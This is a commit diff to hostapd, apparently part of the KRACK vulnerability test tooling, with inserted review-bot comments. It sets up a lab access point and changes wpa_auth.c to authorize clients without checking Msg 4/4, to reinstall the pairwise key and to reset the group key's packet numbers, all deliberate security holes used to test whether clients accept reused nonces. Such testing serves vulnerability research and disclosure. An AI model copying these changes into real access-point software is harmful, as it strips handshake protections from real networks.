
PoC: krack-4way-test.py

Mathy 7 years ago
parent
commit
5873a8e688
4 changed files with 65 additions and 12 deletions
  1. 1 1
      hostapd/defconfig
  2. 7 0
      hostapd/dnsmasq.conf
  3. 6 6
      hostapd/hostapd.conf
  4. 51 5
      src/ap/wpa_auth.c

+ 1 - 1
hostapd/defconfig

@@ -31,7 +31,7 @@ CONFIG_DRIVER_NL80211=y
 #CONFIG_LIBNL20=y
 
 # Use libnl 3.2 libraries (if this is selected, CONFIG_LIBNL20 is ignored)
-#CONFIG_LIBNL32=y
+CONFIG_LIBNL32=y
 
 
 # Driver interface for FreeBSD net80211 layer (e.g., Atheros driver)

+ 7 - 0
hostapd/dnsmasq.conf

@@ -0,0 +1,7 @@
+interface=wlan0
+dhcp-range=192.168.100.10,192.168.100.200,8h
+dhcp-option=3,192.168.100.1
+dhcp-option=6,192.168.100.1
+server=8.8.8.8
+log-queries
+log-dhcp
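Review bot: `interface=wlan0` on the first line of this new file does not match the `interface=wlp0s20u1` that the same commit sets in hostapd/hostapd.conf, so unless hostapd is started with `-i wlan0` the DHCP server and the AP are bound to different interfaces and test clients never get a lease. Use one interface name in both files, or record the expectation in a leading comment such as `# must match the interface hostapd is started on (hostapd.conf or the -i override)`. The router and DNS options both point at 192.168.100.1, which nothing in this commit assigns to the interface; presumably that is done by hand before dnsmasq starts, and a comment saying so would save the next person a debugging session. `server=8.8.8.8` forwards every test client's DNS query to a public resolver; if the test network is meant to stay isolated, drop that line or point it at a local resolver.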

+ 6 - 6
hostapd/hostapd.conf

@@ -5,7 +5,7 @@
 # management frames with the Host AP driver); wlan0 with many nl80211 drivers
 # Note: This attribute can be overridden by the values supplied with the '-i'
 # command line parameter.
-interface=wlan0
+interface=wlp0s20u1
 
 # In case of atheros and nl80211 driver interfaces, an additional
 # configuration parameter, bridge, may be used to notify hostapd if the
@@ -85,7 +85,7 @@ ctrl_interface_group=0
 ##### IEEE 802.11 related configuration #######################################
 
 # SSID to be used in IEEE 802.11 management frames
-ssid=test
+ssid=testnetwork
 # Alternative formats for configuring SSID
 # (double quoted string, hexdump, printf-escaped string)
 #ssid2="test"
@@ -1134,7 +1134,7 @@ own_ip_addr=127.0.0.1
 # and/or WPA2 (full IEEE 802.11i/RSN):
 # bit0 = WPA
 # bit1 = IEEE 802.11i/RSN (WPA2) (dot11RSNAEnabled)
-#wpa=1
+wpa=2
 
 # WPA pre-shared keys for WPA-PSK. This can be either entered as a 256-bit
 # secret in hex format (64 hex digits), wpa_psk, or as an ASCII passphrase
@@ -1143,7 +1143,7 @@ own_ip_addr=127.0.0.1
 # wpa_psk (dot11RSNAConfigPSKValue)
 # wpa_passphrase (dot11RSNAConfigPSKPassPhrase)
 #wpa_psk=0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef
-#wpa_passphrase=secret passphrase
+wpa_passphrase=abcdefgh
 
 # Optionally, WPA PSKs can be read from a separate text file (containing list
 # of (PSK,MAC address) pairs. This allows more than one PSK to be configured.
@@ -1176,9 +1176,9 @@ own_ip_addr=127.0.0.1
 # TKIP will be used as the group cipher.
 # (dot11RSNAConfigPairwiseCiphersTable)
 # Pairwise cipher for WPA (v1) (default: TKIP)
-#wpa_pairwise=TKIP CCMP
+wpa_pairwise=CCMP
 # Pairwise cipher for RSN/WPA2 (default: use wpa_pairwise value)
-#rsn_pairwise=CCMP
+rsn_pairwise=CCMP
 
 # Time interval for rekeying GTK (broadcast/multicast encryption keys) in
 # seconds. (dot11RSNAConfigGroupRekeyTime)
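Review bot: `wpa_passphrase=abcdefgh` in the `@@ -1143` hunk is the shortest passphrase WPA2-PSK accepts and is committed in plain text next to the SSID, for an AP whose 4-way handshake this commit deliberately makes non-standard in src/ap/wpa_auth.c. A unique per-lab passphrase, or one read from a file kept out of the repository via the `wpa_psk_file` mechanism the surrounding comments describe, keeps unrelated clients in range from associating to the test AP by accident. A one-line comment above the setting, e.g. `# test-lab credential only; this AP intentionally misbehaves, keep it isolated`, would make that intent explicit to whoever copies this config.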

+ 51 - 5
src/ap/wpa_auth.c

@@ -5,6 +5,7 @@
  * This software may be distributed under the terms of the BSD license.
  * See README for more details.
  */
+#include <time.h>
 
 #include "utils/includes.h"
 
@@ -53,10 +54,10 @@ static void wpa_group_get(struct wpa_authenticator *wpa_auth,
 static void wpa_group_put(struct wpa_authenticator *wpa_auth,
 			  struct wpa_group *group);
 
-static const u32 dot11RSNAConfigGroupUpdateCount = 4;
-static const u32 dot11RSNAConfigPairwiseUpdateCount = 4;
-static const u32 eapol_key_timeout_first = 100; /* ms */
-static const u32 eapol_key_timeout_subseq = 1000; /* ms */
+static const u32 dot11RSNAConfigGroupUpdateCount = 4000;
+static const u32 dot11RSNAConfigPairwiseUpdateCount = 4000;
+static const u32 eapol_key_timeout_first = 2000; /* ms */
+static const u32 eapol_key_timeout_subseq = 2000; /* ms */
 static const u32 eapol_key_timeout_first_group = 500; /* ms */
 
 /* TODO: make these configurable */
@@ -163,6 +164,23 @@ static inline int wpa_auth_start_ampe(struct wpa_authenticator *wpa_auth,
 }
 #endif /* CONFIG_MESH */
 
+void poc_log(const u8 *clientmac, const char *format, ...)
+{
+	time_t rawtime;
+	struct tm *timeinfo;
+
+	va_list arg;
+	va_start(arg, format);
+
+	time(&rawtime);
+	timeinfo = localtime(&rawtime);
+	printf("[%02d:%02d:%02d] " MACSTR ": Hostapd: ", timeinfo->tm_hour,
+		timeinfo->tm_min, timeinfo->tm_sec, MAC2STR(clientmac));
+
+	vprintf(format, arg);
+
+	va_end(arg); 
+}
 
 int wpa_auth_for_each_sta(struct wpa_authenticator *wpa_auth,
 			  int (*cb)(struct wpa_state_machine *sm, void *ctx),
@@ -971,6 +989,15 @@ void wpa_receive(struct wpa_authenticator *wpa_auth,
 	} else if (key_data_length == 0) {
 		msg = PAIRWISE_4;
 		msgtxt = "4/4 Pairwise";
+
+		// Still mark connection as complete, so we do receive and accept encrypted data
+		if (sm->keycount <= 0) {
+			wpa_auth_set_eapol(sm->wpa_auth, sm->addr, WPA_EAPOL_authorized, 1);
+			sm->keycount = 1;
+		}
+
+		//poc_log(sm->addr, "Ignoring Msg4/4\n");
+		return;
 	} else {
 		msg = PAIRWISE_2;
 		msgtxt = "2/4 Pairwise";
@@ -2217,11 +2244,28 @@ SM_STATE(WPA_PTK, PTKINITNEGOTIATING)
 		return;
 	}
 
+	if (sm->TimeoutCtr > 1 && !sm->pairwise_set) {
+		poc_log(sm->addr, "already installing pairwise key\n");
+		enum wpa_alg alg = wpa_cipher_to_alg(sm->pairwise);
+		int klen = wpa_cipher_key_len(sm->pairwise);
+		if (wpa_auth_set_key(sm->wpa_auth, 0, alg, sm->addr, 0,
+				     sm->PTK.tk, klen)) {
+			wpa_sta_disconnect(sm->wpa_auth, sm->addr);
+			return;
+		}
+		sm->pairwise_set = TRUE;
+	}
+
+	// Reset transmit packet number of the group key, so we can detect if clients
+	// will accept re-used packet numbers (IVs) in broadcast data frames. Debug
+	// output is printed below.
+	wpa_group_config_group_keys(sm->wpa_auth, sm->group);
+
 	/* Send EAPOL(1, 1, 1, Pair, P, RSC, ANonce, MIC(PTK), RSNIE, [MDIE],
 	   GTK[GN], IGTK, [FTIE], [TIE * 2])
 	 */
 	os_memset(rsc, 0, WPA_KEY_RSC_LEN);
-	wpa_auth_get_seqnum(sm->wpa_auth, NULL, gsm->GN, rsc);
+	//wpa_auth_get_seqnum(sm->wpa_auth, NULL, gsm->GN, rsc);
 	/* If FT is used, wpa_auth->wpa_ie includes both RSNIE and MDIE */
 	wpa_ie = sm->wpa_auth->wpa_ie;
 	wpa_ie_len = sm->wpa_auth->wpa_ie_len;
@@ -2374,6 +2418,8 @@ SM_STATE(WPA_PTK, PTKINITNEGOTIATING)
 	}
 #endif /* CONFIG_P2P */
 
+	poc_log(sm->addr, "Resetting Tx IV of group key and sending Msg4/4\n");
+
 	wpa_send_eapol(sm->wpa_auth, sm,
 		       (secure ? WPA_KEY_INFO_SECURE : 0) | WPA_KEY_INFO_MIC |
 		       WPA_KEY_INFO_ACK | WPA_KEY_INFO_INSTALL |
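Review bot: In the wpa_receive hunk (`@@ -971`), the `key_data_length == 0` branch now calls `wpa_auth_set_eapol(..., WPA_EAPOL_authorized, 1)` and returns before the replay-counter and MIC validation that the remainder of wpa_receive performs, so the controlled port is opened for any EAPOL-Key frame with empty key data, genuine Msg 4/4 or not; that is presumably intended for the test harness, but the comment should say so, e.g. `/* PoC only: authorizes the port without verifying the Msg 4/4 MIC or replay counter; never enable outside an isolated test network */`. wpa_receive starts and ends outside the hunk, and `sm->keycount` is not declared anywhere in this diff, so I could not confirm where it is initialised. In poc_log, `localtime()` may return NULL and is not reentrant; computing the timestamp into a local `struct tm` with `localtime_r()` before `va_start` and returning early on failure avoids the unchecked dereference on the `printf` line, and the function also lacks a prototype or `static`, a printf-format attribute (`__attribute__((format(printf, 2, 3)))`) so callers' format strings are checked, and has trailing whitespace after `va_end(arg);`. The commented-out `wpa_auth_get_seqnum` call in PTKINITNEGOTIATING and the `//poc_log(...)` line should be removed or gated rather than left as dead code, with a short comment recording that `rsc` is deliberately left zeroed so the test described in the "Reset transmit packet number" comment can be read from the code alone.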